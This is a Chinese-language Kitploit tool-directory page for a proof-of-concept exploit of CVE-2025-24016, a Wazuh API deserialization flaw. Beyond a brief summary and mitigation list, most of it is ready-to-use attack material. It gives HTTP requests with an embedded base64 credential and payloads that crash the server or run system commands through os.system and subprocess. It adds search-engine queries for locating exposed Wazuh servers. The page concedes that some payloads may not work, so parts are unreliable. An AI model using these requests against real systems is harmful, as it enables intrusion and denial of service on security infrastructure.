Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-24016-Wazuh-Remote-Code-Execution-RCE-PoC — 已识别出Wazuh服务器中存在一个关键RCE漏洞,原因是wazuh-manager包中的不安全反序列化。该漏洞影响Wazuh版本≥4.4.0,并已在4.9.1版本中修复。 | Kitploit
工具/GitHubGitHub/cybersecplayground/cve-2025-24016-wazuh-remote-code-execution-rce-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队Payload 开发
GitHubcybersecplayground/cve-2025-24016-wazuh-remote-code-execution-rce-poc

CVE-2025-24016-Wazuh-Remote-Code-Execution-RCE-PoC

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →

已识别出Wazuh服务器中存在一个关键RCE漏洞,原因是wazuh-manager包中的不安全反序列化。该漏洞影响Wazuh版本≥4.4.0,并已在4.9.1版本中修复。

查看仓库
221年前尚未审核
分享

🚨 Wazuh 远程代码执行 (RCE) - PoC

📌 漏洞摘要

在 Wazuh 服务器中发现了一个严重的 RCE 漏洞,原因是 wazuh-manager 包中存在不安全的反序列化。此漏洞影响 Wazuh 版本 ≥ 4.4.0,并在 4.9.1 版本中修复。

🔍 详情

该缺陷位于 Wazuh API 的 DistributedAPI 中,其中用户控制的输入被不安全地反序列化。这使得拥有API访问权限的攻击者(例如,受感染的仪表板或集群节点)能够通过 run_as 端点在主服务器上执行任意 Python 代码。

📬 概念验证 (Burp 请求)

root@kitploit:~
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==  
Content-Type: application/json

{
  "__unhandled_exc__": {
    "__class__": "exit",
    "__args__": []
  }
}

📌 Authorization 头部是 wazuh-wui:MyS3cr37P450r.*- 的 base64 编码。

📌 该 payload 通过调用 Python 的 exit() 方法导致 Wazuh 服务器关闭。

💥 影响

  • 通过 API 实现完全远程代码执行
  • PoC 中的服务器关闭(拒绝服务)
  • 跨 Wazuh 集群横向移动的风险

🛡️ 缓解措施

  • ✅ 升级到 Wazuh v4.9.1 或更高版本
  • 🚫 避免将 API 暴露在外部
  • 🧪 监控异常的 API 活动

✅ 运行 whoami 的示例 Payload

root@kitploit:~
{
  "__unhandled_exc__": {
    "__class__": "os",
    "__import__": "os",
    "system": "whoami"
  }
}

但仅此还不够,除非反序列化代码实际执行对象树。相反,请使用基于 __reduce__ 的对象来执行代码。

以下是通过类似 pickle 的逻辑使用 Python 的 os.system() 的 Burp 请求 的工作格式:

💣 可用的 Burp RCE Payload (Python 代码执行)

root@kitploit:~
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==
Content-Type: application/json

{
  "__reduce__": [
    "__import__('os').system",
    ["whoami"]
  ]
}

🧬 要运行 ls,请更改 payload:

root@kitploit:~
{
  "__reduce__": [
    "__import__('os').system",
    ["ls -la"]
  ]
}

你也可以使用:

root@kitploit:~
{
  "__reduce__": [
    "__import__('subprocess').getoutput",
    ["id"]
  ]
}

⚠️ 注意:实际的反序列化必须通过后端的 eval() 或类似机制来实现才能生效。根据 Wazuh PoC,如果你能控制 auth_context,这确实是可能的。

🔐 专业提示 在 Burp 中拦截请求,转到 Repeater 标签页,并测试多个 payload,例如:

  • "whoami"
  • "id"
  • "uname -a"
  • "ls /home/wazuh"

👇查询

  • HUNTER : product.name="Wazuh"
  • FOFA : app="Wazuh"

如果响应为空或状态为500,请检查日志 — 有时不会返回输出。

📚 保持敏锐,黑客们!更多漏洞赏金 PoC、绕过方法和payload即将到来!

关注 👉 @cybersecplayground 获取每日黑客内容!

#bugbounty #rce #wazuh #infosec #security #pentest #zeroday #exploit

下载工具